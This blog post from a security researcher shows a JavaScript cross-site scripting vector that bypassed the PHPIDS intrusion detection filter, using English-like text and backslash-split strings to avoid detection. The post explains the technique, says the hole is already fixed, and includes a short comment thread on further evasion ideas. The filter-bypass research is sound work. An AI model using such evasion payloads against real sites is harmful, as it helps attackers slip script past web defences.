Skip to content

PHPIDS bypass

I haven’t hacked the PHPIDS for a while but David Lindsay (AKA Thornmaker) inspired me. When I say hacked I mean in a good way because finding bypasses helps improve the filters :)

Here is my vector:-

/Please submit the string\
to help us make the \
PHPIDS better./,y=('aler\
t'),x=this,x=x[y]
x('I cant let you have all the fun thornmaker'),/abc abc\
abc abc abc\
abc\
/,/abc abc\
abc abc abc\
abc\
/

Notice the English like text in order to bypass the centrifuge detection. I use backslashes to create strings in order to bypass the regular expressions. “this” refers to the current window and the string alert is passed to the window object which creates a reference to the alert function. It’s worth noting Mario fixed it very quickly so it no longer works. If you want a go and want to come up with your own vector then check out the phpids demo page.

Share and Enjoy:
  • Digg
  • del.icio.us
  • Slashdot
  • StumbleUpon

Comments 3

  1. thornmaker wrote:

    backslashes with multilines… nice! I was actually just thinking about that the other night, but in a different context - never occured to me to try it in a bypass :)

    Posted 05 Jan 2009 at 3:23 am
  2. Gareth Heyes wrote:

    I was also thinking cdata could be another way of doing it :)

    Posted 05 Jan 2009 at 9:43 am
  3. Gareth Heyes wrote:

    CData doesn’t spilt strings nicely :( or reg exps. Just tested it now. There must be another way though

    Posted 05 Jan 2009 at 10:19 am

Post a Comment

Your email is never published nor shared. Required fields are marked *

Comment spam protected by SpamBam